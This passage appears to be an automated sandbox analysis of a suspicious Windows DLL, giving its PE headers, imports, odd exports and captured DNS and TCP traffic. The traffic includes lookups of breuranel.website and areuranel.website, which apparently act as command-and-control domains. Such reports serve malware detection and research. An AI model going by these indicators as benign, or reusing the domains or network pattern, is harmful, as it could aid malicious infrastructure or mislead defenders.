                                                                                                                                  Time Stamp:0x5F6FCA4E [Sat Sep 26 23:10:06 2020 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:6
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:6
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:6
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                  jne 00007FEDB4CF5BC7h
                                                                                                                                  call 00007FEDB4CF66B2h
                                                                                                                                  push dword ptr [ebp+10h]
                                                                                                                                  push dword ptr [ebp+0Ch]
                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                  call 00007FEDB4CF5A6Ah
                                                                                                                                  add esp, 0Ch
                                                                                                                                  pop ebp
                                                                                                                                  retn 000Ch
                                                                                                                                  mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                  mov dword ptr fs:[00000000h], ecx
                                                                                                                                  pop ecx
                                                                                                                                  pop edi
                                                                                                                                  pop edi
                                                                                                                                  pop esi
                                                                                                                                  pop ebx
                                                                                                                                  mov esp, ebp
                                                                                                                                  pop ebp
                                                                                                                                  push ecx
                                                                                                                                  ret
                                                                                                                                  mov ecx, dword ptr [ebp-10h]
                                                                                                                                  xor ecx, ebp
                                                                                                                                  call 00007FEDB4CF57C3h
                                                                                                                                  jmp 00007FEDB4CF5BA0h
                                                                                                                                  mov ecx, dword ptr [ebp-14h]
                                                                                                                                  xor ecx, ebp
                                                                                                                                  call 00007FEDB4CF57B2h
                                                                                                                                  jmp 00007FEDB4CF5B8Fh
                                                                                                                                  push eax
                                                                                                                                  push dword ptr fs:[00000000h]
                                                                                                                                  lea eax, dword ptr [esp+0Ch]
                                                                                                                                  sub esp, dword ptr [esp+0Ch]
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  mov dword ptr [eax], ebp
                                                                                                                                  mov ebp, eax
                                                                                                                                  mov eax, dword ptr [100AA0D4h]
                                                                                                                                  xor eax, ebp
                                                                                                                                  push eax
                                                                                                                                  push dword ptr [ebp-04h]
                                                                                                                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                  mov dword ptr fs:[00000000h], eax
                                                                                                                                  ret
                                                                                                                                  push eax
                                                                                                                                  push dword ptr fs:[00000000h]
                                                                                                                                  lea eax, dword ptr [esp+0Ch]
                                                                                                                                  sub esp, dword ptr [esp+0Ch]
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  mov dword ptr [eax], ebp
                                                                                                                                  mov ebp, eax
                                                                                                                                  mov eax, dword ptr [100AA0D4h]
                                                                                                                                  xor eax, ebp
                                                                                                                                  push eax
                                                                                                                                  mov dword ptr [ebp-10h], eax
                                                                                                                                  push dword ptr [ebp-04h]
                                                                                                                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                  mov dword ptr fs:[00000000h], eax
                                                                                                                                  ret
                                                                                                                                  push eax
                                                                                                                                  inc dword ptr fs:[eax]

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0xa89900x80.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa8a100x50.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1460000x53d0.reloc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xa474c0x54.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa47a00x40.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x7b0000x1fc.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x79f710x7a000False0.510071801358data6.7546243609IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x7b0000x2e5860x2e600False0.556366871631data5.60179729877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0xaa0000x9b19c0x1800False0.190266927083data4.15778005426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .reloc0x1460000x53d00x5400False0.752650669643data6.72453697464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllLockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                                                                  USER32.dllCreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
                                                                                                                                  MSACM32.dllacmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                                                                  Exports

                                                                                                                                  NameOrdinalAddress
                                                                                                                                  BeGrass10x10016020
                                                                                                                                  Fieldeight20x100162f0
                                                                                                                                  Often30x10016510
                                                                                                                                  Townenter40x100167a0

                                                                                                                                  Network Behavior

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 12, 2021 00:22:57.520787001 CEST49782443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:22:57.520829916 CEST4434978213.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:22:57.520929098 CEST49782443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:22:57.525758028 CEST49782443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:22:57.525798082 CEST4434978213.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:22:57.851005077 CEST4434978213.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:22:57.851192951 CEST49782443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:22:58.030530930 CEST49782443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:22:58.030558109 CEST4434978213.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:22:58.030838013 CEST4434978213.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:22:58.079046965 CEST49782443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:22:58.731570959 CEST49782443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:22:58.775145054 CEST4434978213.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:22:58.847104073 CEST4434978213.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:22:58.847203970 CEST4434978213.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:22:58.847284079 CEST49782443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:22:58.850059986 CEST49782443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:22:58.850096941 CEST4434978213.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:22:58.850153923 CEST49782443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:22:58.850167036 CEST4434978213.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:00.772372007 CEST49784443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:23:00.772422075 CEST4434978413.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:00.772546053 CEST49784443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:23:00.779629946 CEST49784443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:23:00.779653072 CEST4434978413.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:01.090356112 CEST4434978413.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:01.090495110 CEST49784443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:23:01.096784115 CEST49784443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:23:01.096807003 CEST4434978413.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:01.097215891 CEST4434978413.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:01.303193092 CEST4434978413.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:01.303283930 CEST49784443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:23:01.875718117 CEST49784443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:23:01.919132948 CEST4434978413.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:01.993288040 CEST4434978413.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:01.994883060 CEST4434978413.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:01.996520996 CEST49784443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:23:01.999001980 CEST49784443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:23:01.999062061 CEST4434978413.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:01.999078035 CEST49784443192.168.2.313.82.28.61
                                                                                                                                  Oct 12, 2021 00:23:01.999088049 CEST4434978413.82.28.61192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.175909996 CEST49793443192.168.2.340.97.161.50
                                                                                                                                  Oct 12, 2021 00:23:42.175944090 CEST4434979340.97.161.50192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.179888010 CEST49793443192.168.2.340.97.161.50
                                                                                                                                  Oct 12, 2021 00:23:42.180819035 CEST49793443192.168.2.340.97.161.50
                                                                                                                                  Oct 12, 2021 00:23:42.180844069 CEST4434979340.97.161.50192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.696980000 CEST4434979340.97.161.50192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.696993113 CEST4434979340.97.161.50192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.697113037 CEST49793443192.168.2.340.97.161.50
                                                                                                                                  Oct 12, 2021 00:23:42.699634075 CEST49793443192.168.2.340.97.161.50
                                                                                                                                  Oct 12, 2021 00:23:42.699645042 CEST4434979340.97.161.50192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.699872971 CEST4434979340.97.161.50192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.701802969 CEST49793443192.168.2.340.97.161.50
                                                                                                                                  Oct 12, 2021 00:23:42.743133068 CEST4434979340.97.161.50192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.872004032 CEST4434979340.97.161.50192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.872066021 CEST4434979340.97.161.50192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.872133970 CEST49793443192.168.2.340.97.161.50
                                                                                                                                  Oct 12, 2021 00:23:42.872306108 CEST49793443192.168.2.340.97.161.50
                                                                                                                                  Oct 12, 2021 00:23:42.872328997 CEST4434979340.97.161.50192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.898372889 CEST49794443192.168.2.340.101.60.226
                                                                                                                                  Oct 12, 2021 00:23:42.898422956 CEST4434979440.101.60.226192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.898514032 CEST49794443192.168.2.340.101.60.226
                                                                                                                                  Oct 12, 2021 00:23:42.899671078 CEST49794443192.168.2.340.101.60.226
                                                                                                                                  Oct 12, 2021 00:23:42.899688959 CEST4434979440.101.60.226192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.995965958 CEST4434979440.101.60.226192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.996115923 CEST49794443192.168.2.340.101.60.226
                                                                                                                                  Oct 12, 2021 00:23:42.999381065 CEST49794443192.168.2.340.101.60.226
                                                                                                                                  Oct 12, 2021 00:23:42.999392986 CEST4434979440.101.60.226192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.999603033 CEST4434979440.101.60.226192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.002351999 CEST49794443192.168.2.340.101.60.226
                                                                                                                                  Oct 12, 2021 00:23:43.031394005 CEST4434979440.101.60.226192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.031452894 CEST4434979440.101.60.226192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.031641960 CEST49794443192.168.2.340.101.60.226
                                                                                                                                  Oct 12, 2021 00:23:43.031821012 CEST49794443192.168.2.340.101.60.226
                                                                                                                                  Oct 12, 2021 00:23:43.031841040 CEST4434979440.101.60.226192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.031909943 CEST49794443192.168.2.340.101.60.226
                                                                                                                                  Oct 12, 2021 00:23:43.031922102 CEST4434979440.101.60.226192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.059236050 CEST49795443192.168.2.352.97.151.82
                                                                                                                                  Oct 12, 2021 00:23:43.059287071 CEST4434979552.97.151.82192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.059429884 CEST49795443192.168.2.352.97.151.82
                                                                                                                                  Oct 12, 2021 00:23:43.060195923 CEST49795443192.168.2.352.97.151.82
                                                                                                                                  Oct 12, 2021 00:23:43.060220003 CEST4434979552.97.151.82192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.161293983 CEST4434979552.97.151.82192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.161458969 CEST49795443192.168.2.352.97.151.82
                                                                                                                                  Oct 12, 2021 00:23:43.165437937 CEST49795443192.168.2.352.97.151.82
                                                                                                                                  Oct 12, 2021 00:23:43.165457964 CEST4434979552.97.151.82192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.165863991 CEST4434979552.97.151.82192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.168822050 CEST49795443192.168.2.352.97.151.82
                                                                                                                                  Oct 12, 2021 00:23:43.210756063 CEST4434979552.97.151.82192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.210839033 CEST4434979552.97.151.82192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.211075068 CEST49795443192.168.2.352.97.151.82
                                                                                                                                  Oct 12, 2021 00:23:43.214827061 CEST49795443192.168.2.352.97.151.82
                                                                                                                                  Oct 12, 2021 00:23:43.214859009 CEST4434979552.97.151.82192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.214894056 CEST49795443192.168.2.352.97.151.82
                                                                                                                                  Oct 12, 2021 00:23:43.214901924 CEST4434979552.97.151.82192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.736807108 CEST49796443192.168.2.340.97.161.50
                                                                                                                                  Oct 12, 2021 00:23:43.736841917 CEST4434979640.97.161.50192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.736911058 CEST49796443192.168.2.340.97.161.50
                                                                                                                                  Oct 12, 2021 00:23:43.737413883 CEST49796443192.168.2.340.97.161.50
                                                                                                                                  Oct 12, 2021 00:23:43.737438917 CEST4434979640.97.161.50192.168.2.3

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 12, 2021 00:22:57.489255905 CEST5836153192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:22:57.508589983 CEST53583618.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:22:58.864429951 CEST5361553192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:23:00.653105021 CEST5072853192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:23:00.670943022 CEST53507288.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:02.003659964 CEST5377753192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:23:22.031254053 CEST5805853192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:23:22.051481009 CEST53580588.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:23.253137112 CEST5153953192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:23:23.273200989 CEST53515398.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.152149916 CEST5058553192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:23:42.171742916 CEST53505858.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:42.878056049 CEST6345653192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:23:42.896547079 CEST53634568.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.037961006 CEST5854053192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:23:43.057368040 CEST53585408.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:43.714478016 CEST5510853192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:23:43.735552073 CEST53551088.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:44.434165001 CEST5894253192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:23:44.454426050 CEST53589428.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:23:44.615155935 CEST6443253192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:23:44.635159016 CEST53644328.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:24:03.351385117 CEST5346553192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:24:03.371390104 CEST53534658.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:24:05.052063942 CEST4929053192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:24:05.071163893 CEST53492908.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:24:23.429223061 CEST5975453192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:24:23.444994926 CEST53597548.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:24:23.893990040 CEST4923453192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:24:25.331037045 CEST5872053192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:24:25.348794937 CEST53587208.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:24:25.828843117 CEST5744753192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:24:44.160267115 CEST6409953192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:24:44.179295063 CEST53640998.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:24:46.356193066 CEST6461053192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:24:46.375221014 CEST53646108.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:25:04.193835020 CEST5198953192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:25:04.212004900 CEST53519898.8.8.8192.168.2.3
                                                                                                                                  Oct 12, 2021 00:25:06.399404049 CEST5315253192.168.2.38.8.8.8
                                                                                                                                  Oct 12, 2021 00:25:06.417855024 CEST53531528.8.8.8192.168.2.3

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                  Oct 12, 2021 00:22:57.489255905 CEST192.168.2.38.8.8.80x6f46Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:22:58.864429951 CEST192.168.2.38.8.8.80xcb60Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:00.653105021 CEST192.168.2.38.8.8.80xfc91Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:02.003659964 CEST192.168.2.38.8.8.80x9592Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:22.031254053 CEST192.168.2.38.8.8.80x71b2Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:23.253137112 CEST192.168.2.38.8.8.80xc440Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.152149916 CEST192.168.2.38.8.8.80xcc3dStandard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.878056049 CEST192.168.2.38.8.8.80xb0e4Standard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.037961006 CEST192.168.2.38.8.8.80x12e4Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.714478016 CEST192.168.2.38.8.8.80x77d2Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.434165001 CEST192.168.2.38.8.8.80x792cStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.615155935 CEST192.168.2.38.8.8.80xb80eStandard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:03.351385117 CEST192.168.2.38.8.8.80xef32Standard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:05.052063942 CEST192.168.2.38.8.8.80x871dStandard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:23.429223061 CEST192.168.2.38.8.8.80x51Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:23.893990040 CEST192.168.2.38.8.8.80xfb10Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:25.331037045 CEST192.168.2.38.8.8.80xd3c5Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:25.828843117 CEST192.168.2.38.8.8.80xb553Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:44.160267115 CEST192.168.2.38.8.8.80x6bfcStandard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:46.356193066 CEST192.168.2.38.8.8.80xb5e2Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:04.193835020 CEST192.168.2.38.8.8.80x77e9Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:06.399404049 CEST192.168.2.38.8.8.80xc7d3Standard query (0)outlook.comA (IP address)IN (0x0001)

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                  Oct 12, 2021 00:22:57.508589983 CEST8.8.8.8192.168.2.30x6f46No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:22:58.882258892 CEST8.8.8.8192.168.2.30xcb60No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:00.670943022 CEST8.8.8.8192.168.2.30xfc91No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:02.021467924 CEST8.8.8.8192.168.2.30x9592No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:04.540153980 CEST8.8.8.8192.168.2.30xf380No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:22.051481009 CEST8.8.8.8192.168.2.30x71b2Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:23.273200989 CEST8.8.8.8192.168.2.30xc440Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.171742916 CEST8.8.8.8192.168.2.30xcc3dNo error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.171742916 CEST8.8.8.8192.168.2.30xcc3dNo error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.171742916 CEST8.8.8.8192.168.2.30xcc3dNo error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.171742916 CEST8.8.8.8192.168.2.30xcc3dNo error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.171742916 CEST8.8.8.8192.168.2.30xcc3dNo error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.171742916 CEST8.8.8.8192.168.2.30xcc3dNo error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.171742916 CEST8.8.8.8192.168.2.30xcc3dNo error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.171742916 CEST8.8.8.8192.168.2.30xcc3dNo error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.896547079 CEST8.8.8.8192.168.2.30xb0e4No error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.896547079 CEST8.8.8.8192.168.2.30xb0e4No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.896547079 CEST8.8.8.8192.168.2.30xb0e4No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.896547079 CEST8.8.8.8192.168.2.30xb0e4No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.896547079 CEST8.8.8.8192.168.2.30xb0e4No error (0)HHN-efz.ms-acdc.office.com40.101.60.226A (IP address)IN (0x0001)
